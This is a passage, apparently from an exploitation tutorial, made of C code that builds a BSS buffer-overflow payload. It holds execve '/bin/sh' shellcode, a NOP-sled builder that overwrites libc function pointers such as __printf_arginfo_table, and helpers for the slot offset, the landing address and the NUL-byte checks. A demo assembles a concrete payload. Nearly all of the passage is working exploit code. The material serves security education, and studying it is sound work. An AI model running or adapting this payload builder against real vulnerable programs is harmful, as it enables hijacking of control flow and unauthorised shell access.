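    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SHELLCODE_LEN (sizeof shellcode - 1)

/* RET_POSITION from gdb output: the hijacked slot is `index` words past
 * `target` (index 0 for a plain pointer such as __libc_internal_tsd_get,
 * the conversion character for __printf_arginfo_table).  Returns -1 when
 * the slot lies below the buffer and an overflow cannot reach it. */
long bss_slot_offset(uint32_t bufaddr, uint32_t target, int index)
{
    uint32_t slot = target + 4u * (uint32_t)index;
    return slot < bufaddr ? -1 : (long)(slot - bufaddr);
}

/* Fill `total` bytes with `retaddr` on every 4-byte boundary, then put a
 * NOP sled of `sled_len` bytes and the shellcode at the front.  Every word
 * from the slot onward is the same pointer, so it does not matter which of
 * the overwritten libc pointers gets called first.  Requirements: slot
 * 4-aligned, total >= slot + 4 (the slot is covered), sled + shellcode
 * ending before the slot (the pointer stays intact).  Returns the payload
 * length, or 0 when a requirement is violated. */
size_t build_bss_payload(uint8_t *out, size_t outlen, size_t slot,
                         size_t total, uint32_t retaddr, size_t sled_len)
{
    if (slot % 4 || total < slot + 4 || total + 1 > outlen)
        return 0;
    if (sled_len + SHELLCODE_LEN > slot)
        return 0;
    memset(out, NOP, total);
    for (size_t i = 0; i + 4 <= total; i += 4) {
        out[i]     = retaddr & 0xff;
        out[i + 1] = (retaddr >> 8) & 0xff;
        out[i + 2] = (retaddr >> 16) & 0xff;
        out[i + 3] = (retaddr >> 24) & 0xff;
    }
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, shellcode, SHELLCODE_LEN);
    out[total] = 0;
    return total;
}

/* The hijacked pointer must land in the sled: inside the shellcode it
 * would start mid-instruction, past it there is only the repeated pointer. */
int landing_ok(uint32_t retaddr, uint32_t bufaddr, size_t sled_len)
{
    return retaddr >= bufaddr && retaddr < bufaddr + (uint32_t)sled_len;
}

/* strcpy() stops at the first NUL: the slot word and everything before it
 * must be NUL-free.  Returns the offset of the first NUL or -1. */
long first_nul(const uint8_t *p, size_t upto)
{
    for (size_t i = 0; i < upto; i++)
        if (p[i] == 0)
            return (long)i;
    return -1;
}

uint8_t payload[1024];

/* Constructed demo with e5's numbers: buf at 0x807bc00, slot 264, a
 * 364-byte overflow (the upper limit found above), landing 20 bytes into
 * a 50-byte sled.  Returns the payload length. */
size_t build_e5_demo(void)
{
    return build_bss_payload(payload, sizeof payload, 264, 364,
                             0x807bc00 + 20, 50);
}

int main(void)
{
    size_t n = build_e5_demo();
    printf("e3 slot: %ld  e4 slot: %ld  e5 payload: %zu bytes, first NUL at %ld\n",
           bss_slot_offset(0x807bf60, 0x807c068, 0),
           bss_slot_offset(0x807bbc0, 0x807bd40, '!'),
           n, first_nul(payload, 268));
    return 0;
}
```

bss_slot_offset() reproduces the two RET_POSITION values from the page: 0x807c068 - 0x807bf60 = 264 for e3, and 0x807bd40 + '!' * 4 - 0x807bbc0 = 516 for e4. The builder refuses a sled that would run over the slot and a length that would not cover it, the two mistakes that turn a working layout into a plain crash.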

